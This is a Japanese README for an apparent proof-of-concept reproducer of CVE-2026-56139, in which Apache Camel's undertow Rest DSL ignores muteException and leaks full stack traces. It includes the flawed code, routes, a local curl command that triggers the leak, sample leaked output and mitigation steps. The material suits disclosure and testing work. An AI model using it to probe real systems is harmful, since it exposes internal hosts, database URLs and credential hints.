
このプロジェクトは、Apache Camel の camel-undertow Rest DSL コンシューマにおける 情報漏洩 の問題を示しています。追跡番号は CVE-2026-56139 です。muteException オプションは、キャッチされなかった処理例外の詳細を HTTP クライアントに返すかどうかを制御します。プレーンな undertow エンドポイントではこのオプションは機能しますが、undertow Rest DSL は muteException が ハードコードで false に設定された応答バインディングを作成し、設定値をコピーしないため、REST モードでは muteException が静かに無視され、完全な Java スタックトレースが返されてしまいます。
// UndertowComponent (affected 4.18.2) — the Rest DSL binding is created without the endpoint's muteException
if (!map.containsKey("undertowHttpBinding")) {
endpoint.setUndertowHttpBinding(new RestUndertowHttpBinding(endpoint.isUseStreaming())); // muteException stays false
}
エンドポイントの undertowHttpBinding が非 null になったため、UndertowEndpoint.getUndertowHttpBinding() はその Rest バインディングをそのまま返し、エンドポイントの muteException をコピーするブランチを実行しません。そのため、明示的に muteException=true を設定したルートでも、Rest DSL 経由で提供されるとスタックトレースが漏洩し、内部のバックエンドホスト名、データベース URL、認証情報/ボルトのヒント、ライブラリバージョン、ソースの場所などが開示されます。
この PoC は、エラーメッセージによる情報漏洩 (CWE-209) としての影響を示しています。これは、CVE-2026-49365(プレーンな camel-netty-http および camel-undertow エンドポイントの muteException デフォルトを修正)の Rest DSL 固有の対応物です。両方は CAMEL-23651 の下で一緒に修正されました。
Advisory: https://camel.apache.org/security/CVE-2026-56139.html
| プロパティ | 値 |
|---|---|
| コンポーネント | camel-undertow (Rest DSL コンシューマ) |
| 影響を受けるクラス | org.apache.camel.component.undertow.UndertowComponent — muteException をコピーせずに RestUndertowHttpBinding を作成する(そのためデフォルトは false) |
| CWE | CWE-209 (機密情報を含むエラーメッセージの生成) |
| 影響 | muteException=true が設定されていても、認証されていないクライアントに完全な Java スタックトレースが返される |
| 前提条件 | undertow Rest DSL コンシューマであり、処理例外をトリガーする任意のリクエスト |
| 影響を受けるバージョン | 4.0.0 から 4.14.8 未満、4.15.0 から 4.18.3 未満、4.19.0 から 4.21.0 未満 |
| 修正済みバージョン | 4.14.8, 4.18.3, 4.21.0 |
| JIRA | CAMEL-23651 (PR apache/camel#23913) |
| 報告者 | Yu Bao (PayPal) |
修正により、Rest DSL パスが
endpoint.getMuteException()をRestUndertowHttpBindingにコピーするようになり、Rest DSL が設定(および修正されたデフォルトのtrue)を尊重するようになります。
// Both configured with muteException=true (camel.component.undertow.mute-exception=true):
restConfiguration().component("undertow").host("0.0.0.0").port(8888);
rest("/api").get("/orders").to("direct:boom"); // Rest DSL — IGNORES muteException, leaks
from("direct:boom").process(new FailingProcessor());
from("undertow:http://0.0.0.0:8889/plain/orders") // plain endpoint — HONOURS muteException, empty body
.process(new FailingProcessor());
CVE-2026-56139/
├── pom.xml # camel-undertow 4.18.2
├── Dockerfile
├── docker-compose.yml # single self-contained service
├── README.md
└── src/main/
├── java/com/example/
│ ├── Application.java
│ ├── FailingProcessor.java # throws an exception carrying sensitive internal detail
│ ├── RestRoutes.java # undertow Rest DSL (:8888) + plain undertow endpoint (:8889)
│ └── ExploitController.java # attacker: GETs both, shows Rest DSL leaks while plain is muted
└── resources/
└── application.properties # camel.component.undertow.mute-exception=true
mvn clean package -DskipTests
docker compose up -d --build
curl -s http://localhost:8080/exploit/attack
docker compose down
1) undertow Rest DSL :8888 (muteException=true, but the Rest binding hard-codes false)
HTTP 500
response body (NNNN bytes) — LEAKS internal detail:
| java.lang.IllegalStateException: Inventory lookup failed: cannot connect to
| jdbc:postgresql://prod-db.internal:5432/inventory (user=svc_inventory, ...)
| at com.example.FailingProcessor.process(FailingProcessor.java:...)
| ...[truncated]
2) plain undertow endpoint :8889 (same muteException=true — honoured)
HTTP 500
response body: <empty>
>>> Information disclosure: true
4.14.8 / 4.18.3 / 4.21.0 (CAMEL-23651) にアップグレードしてください。アップグレード後、undertow Rest DSL は muteException を尊重し(デフォルトは true)、スタックトレースは返されなくなります。
アップグレードするまでは、onException(...).handled(true)(またはグローバルエラーハンドラ)を追加して、スタックトレースの代わりに汎用メッセージを返すようにし、undertow Rest DSL コンシューマでは muteException だけに依存しないでください。
この再現器は、セキュリティ研究および許可されたテストのみのために提供されており、公開され修正された脆弱性のためのものです。明示的な許可なくシステムに対して使用しないでください。